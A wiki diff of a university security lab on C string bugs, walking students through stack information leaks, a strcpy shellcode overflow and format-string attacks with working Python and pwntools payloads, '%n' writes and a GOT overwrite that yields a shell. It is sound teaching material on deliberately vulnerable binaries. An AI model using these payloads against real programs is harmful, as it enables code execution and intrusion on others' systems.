Differences

This shows you the differences between two versions of the page.

Link to this comparison view

cns:labs:lab-07 [2019/11/10 19:10]
cristina.popescu [Information Leak]
cns:labs:lab-07 [2022/11/21 14:29] (current)
mihai.dumitru2201 [Basic Format String Attack]
Line 1: Line 1:
-====== Lab 07 - Strings ======+====== Lab 07 - Strings ====== ​
  
-===== Resources =====+===== Tasks repository ​====
  
-  * [[http://​www.cert.org/​books/​secure-coding/​|Secure Coding ​in C and C++]] +All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. 
-  * [[http://​www.informit.com/​articles/​article.aspx?​p=2036582|String representation in C]] +
-  * [[https://​www.owasp.org/​index.php/​Improper_string_length_checking|Improper string length checking]] +
-  * [[http://​cwe.mitre.org/​data/​definitions/​134.html|Format String definition]],​ [[https://​www.owasp.org/​index.php/​Format_string_attack|Format String Attack ​ (OWASP)]], [[http://​projects.webappsec.org/​w/​page/​13246926/​Format%20String|Format String Attack (webappsec)]] ​  +
-  * [[http://​www.gratisoft.us/​todd/​papers/​strlcpy.html|strlcpy and strlcat - consistent, safe, string copy and concatenation.]] This resource is useful to understand some of the string manipulation problems. +
- +
-===== Lab Support Files ===== +
- +
-We will use this [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz|lab archive]] throughout the lab. +
- +
-Please download the lab archive an then unpack it using the commands below: +
-<code bash> +
-student@mjolnir:​~$ wget http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz +
-student@mjolnir:​~$ tar xzf lab-07.tar.gz +
-</​code>​ +
- +
-After unpacking we will get the ''​lab-07/''​ folder that we will use for the lab: +
-<code bash> +
-student@mjolnir:​~$ cd lab-07/ +
-student@mjolnir:​~/​lab-07$ ls +
-basic-format-string ​ basic-info-leak +
-format-string ​ info-leak +
-printf-features ​ string-shellcode +
-</​code>​+
  
 ===== Intro ===== ===== Intro =====
Line 52: Line 29:
 In C, the length of an ASCII string is given by its contents. An ASCII string ends with a ''​0''​ value byte called the ''​NUL''​ byte. Every ''​str*''​ function (i.e. a function with the name starting with ''​str'',​ such as ''​strcpy'',​ ''​strcat'',​ ''​strdup'',​ ''​strstr''​ etc.) uses this ''​0''​ byte to detect where the string ends. As a result, not ending strings in ''​0''​ and using ''​str*''​ functions leads to vulnerabilities. In C, the length of an ASCII string is given by its contents. An ASCII string ends with a ''​0''​ value byte called the ''​NUL''​ byte. Every ''​str*''​ function (i.e. a function with the name starting with ''​str'',​ such as ''​strcpy'',​ ''​strcat'',​ ''​strdup'',​ ''​strstr''​ etc.) uses this ''​0''​ byte to detect where the string ends. As a result, not ending strings in ''​0''​ and using ''​str*''​ functions leads to vulnerabilities.
  
-====  Basic Info Leak (tutorial) ====+====  ​1. Basic Info Leak (tutorial) ====
  
-Enter the ''​basic-info-leak/''​ subfolder ​in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz|lab archive]]. It's a basic information leak example.+Enter the ''​01-basic-info-leak/''​ subfolder. It's a basic information leak example.
  
-In ''​basic_info_leak.c'',​ ''​buf''​ is supplied as input, hence is not trusted. We should be careful with this buffer. If the user gives ''​32''​ bytes as input then ''​strcpy''​ will copy bytes in ''​my_string''​ until it finds a ''​NUL''​ byte (''​0x00''​). Because the [[cns:​labs:​lab-05|stack grows down]], on most platforms, we will start accessing the content of the stack. After the ''​buf''​ variable the stack stores the ''​old ​ebp'',​ the function return address and then the function parameters. This information is copied into ''​my_string''​. As such, printing information in ''​my_string''​ (after byte index ''​32''​) using ''​puts()''​ results in information leaks.+In ''​basic_info_leak.c'',​ ''​buf''​ is supplied as input, hence is not trusted. We should be careful with this buffer. If the user gives ''​32''​ bytes as input then ''​strcpy''​ will copy bytes in ''​my_string''​ until it finds a ''​NUL''​ byte (''​0x00''​). Because the [[cns:​labs:​lab-05|stack grows down]], on most platforms, we will start accessing the content of the stack. After the ''​buf''​ variable the stack stores the ''​old ​rbp'',​ the function return address and then the function parameters. This information is copied into ''​my_string''​. As such, printing information in ''​my_string''​ (after byte index ''​32''​) using ''​puts()''​ results in information leaks.
  
 We can test this using: We can test this using:
 <​code>​ <​code>​
-$ python -c 'print "​A"​*32'​ | ./​basic_info_leak  +$ python -c 'import sys; sys.stdout.buffer.write(b"​A"​*32)' | ./​basic_info_leak  
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX�����+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8
 </​code>​ </​code>​
  
 In order to check the hexadecimal values of the leak, we pipe the output through ''​xxd'':​ In order to check the hexadecimal values of the leak, we pipe the output through ''​xxd'':​
 <​code>​ <​code>​
-$ python -c 'print "​A"​*32'​ | ./​basic_info_leak | xxd+$ python -c 'import sys; sys.stdout.buffer.write(b"​A"​*32)' | ./​basic_info_leak | xxd
 00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA 00000000: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
 00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA 00000010: 4141 4141 4141 4141 4141 4141 4141 4141  AAAAAAAAAAAAAAAA
-00000020: ​786d 99ff f184 0408 0a+00000020: ​d066 57b4 fc7f 0a                        ​.fW....
 </​code>​ </​code>​
  
-We have leaked ​two values ​above: +We have leaked ​one value above: 
-  * the old/stored ''​ebp''​ value (right after the buffer): ''​0xff996d78''​ (it's a little endian architecture);​ it will differ on your system +  * the lower non-0 bytes of the old/stored ''​rbp''​ value (right after the buffer): ''​0x7ffcb45766d0''​ (it's a little endian architecture);​ it will differ on your system
-  * the ''​my_main()''​ return address: ''​0x080484f1''​+
  
-The return address usually doesn'​t change (except for executables with PIE, //Position Independent Executable//​ support). But assuming ASLR is enabled, the ''​ebp''​ value changes at each run. If we leak it we have a basic address that we can toy around to leak or overwrite other values. We'll see more of that in the [[#​p_information_leak|Information Leak]] task. +The return address usually doesn'​t change (except for executables with PIE, //Position Independent Executable//​ support). But assuming ASLR is enabled, the ''​rbp''​ value changes at each run. If we leak it we have a basic address that we can toy around to leak or overwrite other values. We'll see more of that in the [[#​p_information_leak|Information Leak]] task.
-====  Recap: String Shellcode ====+
  
-For starters, let's do a recap on creating a shellcode-based attack and exploiting a string-based vulnerability. +==== 2. Information Leak ==== 
- +
-In the ''​string-shellcode/''​ subfolder in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz|lab archive]] you have a vulnerable executable dubbed ''​string_shellcode''​. The original source code is ''​string_shellcode.c''​. There is an obvious vulnerability when using ''​strcpy()''​ that will lead to an overflow and a rewrite of the ''​get_num_alpha()''​ function return address when called with a large enough number of characters in ''​g_buffer''​. +
- +
-Fill the ''​TODO''​ spots in the ''​exploit.py''​ script to inject and execute a shell. +
- +
-<note tip> +
-ASLR is on. The ''​shellcode''​ will be stored at the beginning of the ''​g_buffer''​ global variable which has a constant address. You can determine it using: +
-<​code>​ +
-nm string_shellcode | grep ' g_buffer'​ +
-</​code>​ +
-</​note>​ +
- +
-<note tip> +
-Use GDB PEDA and ''​pattc''​ and ''​patto''​ to determine the offset between ''​l_buffer''​ and the ''​get_num_alpha()''​ function return address. +
- +
-In GDB/PEDA in order to send a given string (such as the pattern outputted by ''​pattc''​) to the program standard input, use the process substitution construct:​ +
-<​code>​ +
-gdb-peda$ r < <(echo '​AAAA.....'​) +
-</​code>​ +
-</​note>​ +
- +
-<note tip> +
-Construct the ''​payload''​ as usual: add the shellcode, add padding and overwrite the ''​get_num_alpha()''​ function return address with the address of the shellcode (i.e. the address of the ''​g_buffer''​) global variable. +
-</​note>​ +
-==== Information Leak ==== +
  
-We will now show how improper string handling will lead to information leaks from the memory. For this, please access the ''​info-leak/''​ subfolder ​in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz|lab archive]]. Please browse the ''​info-leak.c''​ source code file. The executable file is already generated in ''​info-leak''​ (a 32-bit ELF file).+We will now show how improper string handling will lead to information leaks from the memory. For this, please access the ''​02-info-leak/''​ subfolder. Please browse the ''​info-leak.c''​ source code file.
    
 The snippet below is the relevant code snippet. The goal is to call the ''​my_evil_func()''​ function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the ''​my_evil_func()''​ function by overriding the return address of the ''​my_main()''​ function: The snippet below is the relevant code snippet. The goal is to call the ''​my_evil_func()''​ function. One of the building blocks of exploiting a vulnerability is to see whether or not we have memory write. If you have memory writes, then getting code execution is a matter of getting things right. In this task we are assuming that we have memory write (i.e. we can write any value at any address). You can call the ''​my_evil_func()''​ function by overriding the return address of the ''​my_main()''​ function:
Line 168: Line 118:
 </​code>​ </​code>​
  
-We see we have an information leak. We leak two pieces ​of data above: ''​0x7fffffffdcf0''​. ​The first one seems to be a stack address and the second one a code/text address. +We see we have an information leak. We leak one piece of data above: ''​0x7fffffffdcf0''​.
 If we run multiple times we can see that the values for the first piece of information differs: If we run multiple times we can see that the values for the first piece of information differs:
 <code bash> <code bash>
Line 180: Line 129:
 $ gdb -q ./info_leak $ gdb -q ./info_leak
 Reading symbols from ./​info_leak...done. Reading symbols from ./​info_leak...done.
-gdb-peda$ b printf+gdb-peda$ b my_main
 Breakpoint 1 at 0x400560 Breakpoint 1 at 0x400560
 gdb-peda$ r < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​) gdb-peda$ r < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​)
 Starting program: info_leak < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​) Starting program: info_leak < <(python -c '​import sys; sys.stdout.write(32*"​A"​)'​)
 [...] [...]
 +
 +# Do next instructions until after the call to printf.
 +gdb-peda$ ni
 +....
  
 gdb-peda$ x/12g name gdb-peda$ x/12g name
Line 207: Line 160:
 </​code>​ </​code>​
  
-From the GDB above, we determine that, after our buffer, there are two values: one value is the stored ''​rbp''​ (i.e. old rbp) and one value is the return address ​of the ''​my_main()'' ​function (that gets it back to ''​main()''​).+From the GDB above, we determine that, after our buffer, there is the stored ''​rbp''​ (i.e. old rbp)
 + 
 +<​note>​ 
 +In 32-bit program there would (usually) be 2 leaked values: 
 +  * The old ''​ebp''​ 
 +  * The return address of the function 
 + 
 +This happens if the values of the old ''​ebp'' ​and the return address ​don't have any ''​\x00''​ bytes. 
 + 
 +in the 64-bit example we only get the old ''​rbp'' ​because the 2 high bytes of the stack address are always ​''​0'' ​which causes the string to be terminated early. 
 +</​note>​
  
-When we leak the two values we are able to retrieve the stored ''​rbp''​ value. In the above run the value of ''​ebp''​ is ''​0x00007fffffffdc50''​. We also see that the stored ''​rbp''​ value is stored at **address** ''​0x7fffffffdc40'',​ which is the address current ''​rbp''​. We have the situation in the below diagram:+When we leak the two values we are able to retrieve the stored ''​rbp''​ value. In the above run the value of ''​rbp''​ is ''​0x00007fffffffdc50''​. We also see that the stored ''​rbp''​ value is stored at **address** ''​0x7fffffffdc40'',​ which is the address current ''​rbp''​. We have the situation in the below diagram:
  
 {{ :​cns:​labs:​info-leak-stack-64.png?​600 |}} {{ :​cns:​labs:​info-leak-stack-64.png?​600 |}}
Line 215: Line 178:
 We marked the stored ''​rbp''​ value (i.e. the frame pointer for ''​main()'':​ ''​0x7fffffffdc50''​) with the font color red in both places. We marked the stored ''​rbp''​ value (i.e. the frame pointer for ''​main()'':​ ''​0x7fffffffdc50''​) with the font color red in both places.
  
-In short, if we leak the value of the stored ''​rbp''​ (i.e. the frame pointer for ''​main()'':​ ''​0x00007fffffffdc50''​) we can determine the address ​where the current ''​rbp''​ (i.e. the frame pointer for ''​my_main()'':​ ''​0x7fffffffdc40''​) by subtracting ''​16''​. The address where the ''​my_main()''​ return address is stored (''​0x7fffffffdc48''​) is computed by subtracting ''​8''​ from the leaked ''​rbp''​ value. By overwriting the value at this address we will force an arbitrary code execution and call ''​my_evil_func()''​.+In short, if we leak the value of the stored ''​rbp''​ (i.e. the frame pointer for ''​main()'':​ ''​0x00007fffffffdc50''​) we can determine the address ​of the current ''​rbp''​ (i.e. the frame pointer for ''​my_main()'':​ ''​0x7fffffffdc40''​)by subtracting ''​16''​. The address where the ''​my_main()''​ return address is stored (''​0x7fffffffdc48''​) is computed by subtracting ''​8''​ from the leaked ''​rbp''​ value. By overwriting the value at this address we will force an arbitrary code execution and call ''​my_evil_func()''​.
  
 In order to write the return address of the ''​my_main()''​ function with the address of the ''​my_evil_func()''​ function, make use of the conveniently (but not realistically) placed ''​my_memory_write()''​ function. The ''​my_memory_write()''​ allows the user to write arbitrary values to arbitrary memory addresses. In order to write the return address of the ''​my_main()''​ function with the address of the ''​my_evil_func()''​ function, make use of the conveniently (but not realistically) placed ''​my_memory_write()''​ function. The ''​my_memory_write()''​ allows the user to write arbitrary values to arbitrary memory addresses.
Line 222: Line 185:
  
 <note tip> <note tip>
-Same as above, use ''​nm''​ to determine address of the ''​my_evil_func()''​ function.+Same as above, use ''​nm''​ to determine address of the ''​my_evil_func()''​ function.  
 +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. The precompiled binary can be found in [[cns:​resources:​repo|the CNS public repository]].
 </​note>​ </​note>​
  
 <note tip> <note tip>
-Use the above logic to determine the ''​old ​ebp''​ leak and then the address of the ''​my_main()''​ return address.+Use the above logic to determine the ''​old ​rbp''​ leak and then the address of the ''​my_main()''​ return address.
 </​note>​ </​note>​
  
Line 234: Line 198:
  
 <note tip> <note tip>
-In case of a successful exploit the program will return with the ''​42''​ error code in the ''​my_evil_func()''​ function, same as below:+In case of a successful exploit the program will spawn a shell in the ''​my_evil_func()''​ function, same as below:
 <​code>​ <​code>​
 $ python exploit.py ​ $ python exploit.py ​
 [!] Could not find executable '​info_leak'​ in $PATH, using '​./​info_leak'​ instead [!] Could not find executable '​info_leak'​ in $PATH, using '​./​info_leak'​ instead
 [+] Starting local process '​./​info_leak':​ pid 6422 [+] Starting local process '​./​info_leak':​ pid 6422
-[*] old_ebp ​is 0x7fffffffdd40+[*] old_rbp ​is 0x7fffffffdd40
 [*] return address is located at is 0x7fffffffdd38 [*] return address is located at is 0x7fffffffdd38
-[*] Process '​./​info_leak'​ stopped with exit code 42 (pid 6422)+[*] Switching to interactive mode 
 +Returning from main! 
 +$ id 
 +uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
 </​code>​ </​code>​
 </​note>​ </​note>​
Line 262: Line 229:
 Let's recap some of [[http://​www.cplusplus.com/​reference/​cstdio/​printf/​|useful formats]]: Let's recap some of [[http://​www.cplusplus.com/​reference/​cstdio/​printf/​|useful formats]]:
  
-  * %08x -- prints a number in hex format, meaning takes a number from the stack and prints in hex format +  * ''​%08x'' ​-- prints a number in hex format, meaning takes a number from the stack and prints in hex format 
-  * %s -- prints a string, meaning takes a pointer from the stack and prints the string from that address +  * ''​%s'' ​-- prints a string, meaning takes a pointer from the stack and prints the string from that address 
-  * %n -- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). This format is not widely used but it is in the C standard.+  * ''​%n'' ​-- writes the number of bytes written so far to the address given as a parameter to the function (takes a pointer from the stack). This format is not widely used but it is in the C standard.
  
 ''​%x''​ and ''​%n''​ are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user. ''​%x''​ and ''​%n''​ are enough to have memory read and write and hence, to successfully exploit a vulnerable program that calls printf (or other format string function) directly with a string controlled by the user.
Line 299: Line 266:
 ==== Basic Format String Attack ==== ==== Basic Format String Attack ====
  
-You will now do a basic format string attack using the ''​basic-format-string/''​ subfolder ​in the [[http://​elf.cs.pub.ro/​oss/​res/​labs/​lab-07.tar.gz|lab archive]]. The source code is in ''​basic_format_string.c''​ and the executable is in ''​basic_format_string''​.+You will now do a basic format string attack using the ''​03-basic-format-string/''​ subfolder. The source code is in ''​basic_format_string.c''​ and the executable is in ''​basic_format_string''​.
  
-You need to use ''​%n''​ to overwrite the value of the ''​v''​ variable to ''​200''​. You have to do three steps:+You need to use ''​%n''​ to overwrite the value of the ''​v''​ variable to ''​0x300''​. You have to do three steps:
   - Determine the address of the ''​v''​ variable using ''​nm''​.   - Determine the address of the ''​v''​ variable using ''​nm''​.
   - Determine the ''​n''​-th parameter of ''​printf()''​ that you can write to using ''​%n''​. The ''​buffer''​ variable will have to be that parameter; you will store the address of the ''​v''​ variable in the ''​buffer''​ variable.   - Determine the ''​n''​-th parameter of ''​printf()''​ that you can write to using ''​%n''​. The ''​buffer''​ variable will have to be that parameter; you will store the address of the ''​v''​ variable in the ''​buffer''​ variable.
-  - Construct a format string that enables the attack; the number of characters processed by ''​printf()''​ until ''​%n''​ is matched will have to be ''​200''​.+  - Construct a format string that enables the attack; the number of characters processed by ''​printf()''​ until ''​%n''​ is matched will have to be ''​0x300''​.
  
 For the second step let's run the program multiple times and figure out where the ''​buffer''​ address starts. We fill ''​buffer''​ with the ''​aaaa''​ string and we expect to discover it using the ''​printf()''​ format specifiers. For the second step let's run the program multiple times and figure out where the ''​buffer''​ address starts. We fill ''​buffer''​ with the ''​aaaa''​ string and we expect to discover it using the ''​printf()''​ format specifiers.
Line 325: Line 292:
 </​code>​ </​code>​
  
-In the last run we get the ''​4141414141414141''​ representation of ''​AAAAAAAA''​. That means that, if we replace the final ''​%lx''​ with ''​%n'',​ we will write the address ''​0x4141414141414141''​ the number of characters processed so far:+In the last run we get the ''​4141414141414141''​ representation of ''​AAAAAAAA''​. That means that, if we replace the final ''​%lx''​ with ''​%n'',​ we will write at the address ''​0x4141414141414141''​ the number of characters processed so far:
 <​code>​ <​code>​
 $ echo -n '​7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a'​ | wc -c $ echo -n '​7fffffffdcc07fffffffdcc01f6022997ffff7fd44c0786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c25786c6c2540000a'​ | wc -c
Line 331: Line 298:
 </​code>​ </​code>​
  
-We need that number to be ''​200''​. You can fine tune the format string by using a construct such as ''​%32llx''​ to print a number on ''​32''​ characters instead of a maximum of ''​16''​ characters. See how much extra room you need and see if you reach ''​200''​ bytes.+We need that number to be ''​0x300''​. You can fine tune the format string by using a construct such as ''​%32llx''​ to print a number on ''​32''​ characters instead of a maximum of ''​16''​ characters. See how much extra room you need and see if you reach ''​0x300''​ bytes.
  
 <note important>​ <note important>​
Line 339: Line 306:
 After the plan is complete, write down the attack by filling the ''​TODO''​ lines in the ''​exploit.py''​ solution skeleton. After the plan is complete, write down the attack by filling the ''​TODO''​ lines in the ''​exploit.py''​ solution skeleton.
  
-After you write 200 chars in v, you should obtain shell+/* 
 +<note tip> 
 +When sending your exploit to the remote server, adjust this address according to the binary running on the remote endpoint. The precompiled binary can be found in [[cns:​resources:​repo|the CNS public repository]]. 
 +</​note>​ 
 +*/ 
 + 
 +After you write 0x300 chars in v, you should obtain shell
 <​code>​ <​code>​
-$ python ​exploit64.py +$ python ​exploit.py 
 [!] Could not find executable '​basic_format_string'​ in $PATH, using '​./​basic_format_string'​ instead [!] Could not find executable '​basic_format_string'​ in $PATH, using '​./​basic_format_string'​ instead
 [+] Starting local process '​./​basic_format_string':​ pid 20785 [+] Starting local process '​./​basic_format_string':​ pid 20785
Line 350: Line 323:
  
 ==== Extra: Format String Attack ==== ==== Extra: Format String Attack ====
 +
 +Go to the ''​04-format-string/''​ subfolder.
 +In this task you will be working with a **32-bit binary**.
  
 The goal of this task is to call ''​my_evil_func''​ again. This task is also tutorial based. The goal of this task is to call ''​my_evil_func''​ again. This task is also tutorial based.
Line 385: Line 361:
 Now, because we are able to select //any// higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer. Now, because we are able to select //any// higher address with this function and because the buffer is on the stack, sooner or later we will discover our own buffer.
 <code bash> <code bash>
-$ ./format "$(perl -'printf ​"%%08x\x0a"x10000'​)" ​+$ ./format "$(python ​-'print("%08x\n" ​* 10000)'​)" ​
 </​code>​ </​code>​
  
Line 397: Line 373:
 </​code>​ </​code>​
  
-By trial and error or by using GDB (breakpoint on ''​printf''​) we can determine+By trial and error or by using GDB (breakpoint on ''​printf''​) we can determine ​where the buffer starts
 <code bash> <code bash>
-$ ./format "$(perl -'printf ​"A"x512 . "%%08x   ​\x0a"x200'​)" ​ | grep -n 41 | head +$ ./format "$(python ​-'import sys; sys.stdout.buffer.write(b"ABCD" ​+ b"%08x\n   " ​* 0x300)'​)" ​ | grep -n 41 | head 
-17:415729ac ​   +10:   ffffc410 
-56:ffffdd41 ​   +52:   ffffcc41 
-128:41007461 ​   +72:   ffffcf41 
-129:41414141 ​  ​ +175:   44434241
-130:​41414141 ​+
 </​code>​ </​code>​
  
 <​note>​ <​note>​
-Command line Perl/Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference ​Perl script to write your exploit. The code is equivalent to the above one-liner.+Command line Python exploits tend to get very tedious and hard to read when the payload gets more complex. You can use the following reference ​pwntools ​script to write your exploit. The code is equivalent to the above one-liner.
  
-<​code ​perl+<​code ​python
-#​!/​usr/​bin/​env ​perl+#​!/​usr/​bin/​env ​python3
  
-use strict; +from pwn import *
-use warnings; +
-use v5.20;+
  
-my $stack_items = 1000;+stack_items = 200
  
-printf ​"A" ​x 512; +pad = b"ABCD
-printf ​"%%08x   ​\x0a" ​x $stack_items;+val_fmt = b"%08x\n   " 
 +# add a \n at the end for consistency with the command line run 
 +fmt = pad + val_fmt * stack_items ​+ b"​\n"​ 
 + 
 +io = process(["​./​format",​ fmt]) 
 + 
 +io.interactive()
 </​code>​ </​code>​
  
-Then call the ''​format''​ using (note the enclosing double-quotes):+Then call the ''​format''​ using:
  
 <​code>​ <​code>​
-./format "​$(perl ​exploit.pl)"+python ​exploit.py
 </​code>​ </​code>​
 </​note>​ </​note>​
  
-One idea is to keep things in multiple of 4, like I did for "​%08x ​  \x0a". If you are looking at line ''​128''​, one of our ''​A''​is there. Because ​the machine is little endian, the 0x41 appears as most significant byte. We want to fix this, to have our buffer aligned. Note, you can add as many format strings you want, the start of the buffer will be the same (more or less).+One idea is to keep things in multiple of 4, like "​%08x ​  \n". If you are looking at line ''​175'' ​we have ''​44434241'' ​which is the base 16 representation of ''"​ABCD"''​ (because it'​s ​little endian). Note, you can add as many format strings you want, the start of the buffer will be the same (more or less).
  
 We can compress our buffer by specifying the position of the argument. We can compress our buffer by specifying the position of the argument.
 <code bash> <code bash>
-$ ./​format ​"$(perl -'printf ​"BCDE"."A"x510 . "%%126\$08x"'​)" +$ ./format $(python ​-'import sys; sys.stdout.buffer.write(b"ABCD" ​+ b"AAAAAAAA" ​* 199 + b"%175$08x")') 
-BCDEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45444342+ABCDAAAAAAAA...AAAAAAAAAAAAAAAAAAAAAAAAAAAA44434241
 This is the most useless and insecure program! This is the most useless and insecure program!
 </​code>​ </​code>​
-You can see that the last information is our "BCDE" string printed with ''​%08x''​ this means that we know where'​s ​our buffer.+ 
 +<note warning>''​b"​AAAAAAAA"​ * 199''​ is added to maintain the length of the original string, otherwise the offset might change.</​note>​ 
 +You can see that the last information is our b"ABCD" string printed with ''​%08x''​ this means that we know where our buffer ​is.
  
 <note tip> <note tip>
Line 468: Line 449:
 We can replace ''​%08x''​ with ''​%n''​ this should lead to segmentation fault. We can replace ''​%08x''​ with ''​%n''​ this should lead to segmentation fault.
 <code bash> <code bash>
-$ ./format "$(perl -'printf ​"BCDE"."A"x510 . "%%126\$08n"'​)"​+$ ./format "$(python ​-'import sys; sys.stdout.buffer.write(b"ABCD" ​+ b"AAAAAAAA" ​* 199 + b"%175$08n")'​)"​
 Segmentation fault (core dumped) Segmentation fault (core dumped)
 $ gdb ./format -c core $ gdb ./format -c core
Line 482: Line 463:
 => 0xf7e580a2 <​vfprintf+17906>:​ mov ​   %edx,(%eax) => 0xf7e580a2 <​vfprintf+17906>:​ mov ​   %edx,(%eax)
 (gdb) info registers $edx $eax (gdb) info registers $edx $eax
-edx            0x202 514 +edx            0x202 1596 
-eax            ​0x45444342 1162101570+eax            ​0x44434241 1145258561
 (gdb) quit (gdb) quit
 </​code>​ </​code>​
-Bingo. We have memory write. The vulnerable code tried to write at the address ''​0x45444342''​ ("BCDE" little endian) the value 514. The value 514 is the amount of data wrote so far by ''​printf''​ (510 ''​A''​s and "BCDE").+Bingo. We have memory write. The vulnerable code tried to write at the address ''​0x44434241''​ ("ABCD" little endian) the value 1596. The value 1596 is the amount of data wrote so far by ''​printf''​ (''"​ABCD" ​+ 199 * "​AAAAAAAA"''​).
  
-Right now, our input string has 518 bytes. But we can further compress it, thus making the value that we write independent of the length of the input.+Right now, our input string has 1605 bytes (1604 with a ''​\n''​ at the end). But we can further compress it, thus making the value that we write independent of the length of the input.
  
 <code bash> <code bash>
-$ ./format "$(perl -'printf ​"BCDE""​A"​x506 . "%%99x" ​"%%126\$08n"'​)"​+$ ./format "$(python ​-'import sys; sys.stdout.buffer.write("ABCD" ​"​A" ​* 1588 + "​%99x" ​"​%126$08n"​)'​)"​
 Segmentation fault (core dumped) Segmentation fault (core dumped)
 $ gdb ./format -c core $ gdb ./format -c core
 (gdb) info registers $edx $eax (gdb) info registers $edx $eax
-edx            0x261 609 +edx            0x261 1691 
-eax            ​0x45444342 1162101570+eax            ​0x44434241 1145258561
 (gdb) quit (gdb) quit
 </​code>​ </​code>​
-Here we managed to write 609 (4+506+99). Note we should keep the number of bytes before the format string the same. Which means that if we want to print with a padding of 100 (three digits) we should remove one ''​A''​. You can try this by yourself.+Here we managed to write 1691 (4+1588+99). Note we should keep the number of bytes before the format string the same. Which means that if we want to print with a padding of 100 (three digits) we should remove one ''​A''​. You can try this by yourself.
  
 **How far can we go?** Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with ''​snprintf''​. 255 should be enough. **How far can we go?** Probably we can use any integer for specifying the number of bytes which are used for a format, but we don't need this; moreover specifying a very large padding is not always feasible, think what happens when printing with ''​snprintf''​. 255 should be enough.
Line 505: Line 486:
 Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 bytes at a time we can make use of the endianess of the machine. **The idea** is to write at the address n and then at the address n+1 and so on. Remember, we want to write a value to a certain address. So far we control the address, but the value is somewhat limited. If we want to write 4 bytes at a time we can make use of the endianess of the machine. **The idea** is to write at the address n and then at the address n+1 and so on.
  
-Lets first display the address. We are using the address ''​0x804a008''​. This address is the address of the got entry for the puts function. Basically, we will override the got entry for the puts.+Lets first display the address. We are using the address ''​0x804c014''​. This address is the address of the got entry for the puts function. Basically, we will override the got entry for the puts.
  
-<code bash> +Check the ''​exploit.py'' ​script from the task directory, read the commends and understand what it does.
-$ objdump -R ./format | grep puts +
-0804a008 R_386_JUMP_SLOT ​  ​puts +
-$ ./format "​$(perl -e 'printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%255x|"​ . "​%%126\$08x"​ . "​%%255x|"​ . "​%%127\$08x"​ . "​%%255x|"​ . "​%%128\$08x"​')" +
- +
- +
-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ​... +
-0|0804a008 +
-f7e2a4d3|0804a009 +
-2|0804a00a +
-ffffd2c4|0804a00b +
-                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            This is the most useless and insecure program! +
- +
-</​code>​ +
-Why are we printing 498 ''​A''​s?​ We added 12 bytes before our format and 6 extra bytes for the output -- the ''​|''​ is there only for pretty print. We want to keep in place the first argument -- anyway, you should always check this.+
  
-Lets replace the ''​%x''​ with ''​%n''​ 
 <code bash> <code bash>
-$ ./format ​"​$(perl -e 'printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%255x|"​ . "​%%126\$08n"​ . "​%%255x|"​ . "​%%127\$08n"​ . "​%%255x|"​ . "​%%128\$08n"​ . "​%%255x|"​ . "​%%129\$08n"'​)"​ +python exploit.py 
-$ gdb ./​format ​-c core +[*] 'format'​ 
-Program terminated with signal 11, Segmentation fault. +    ​Arch: ​    i386-32-little 
-#0  0x02020202 in ?? () +    ​RELRO: ​   Partial RELRO 
-(gdb) x/x 0x0804a000 +    ​Stack: ​   No canary found 
-0x804a000 <​printf@got.plt>​: 0xf7e5ded0 +    ​NX: ​      NX enabled 
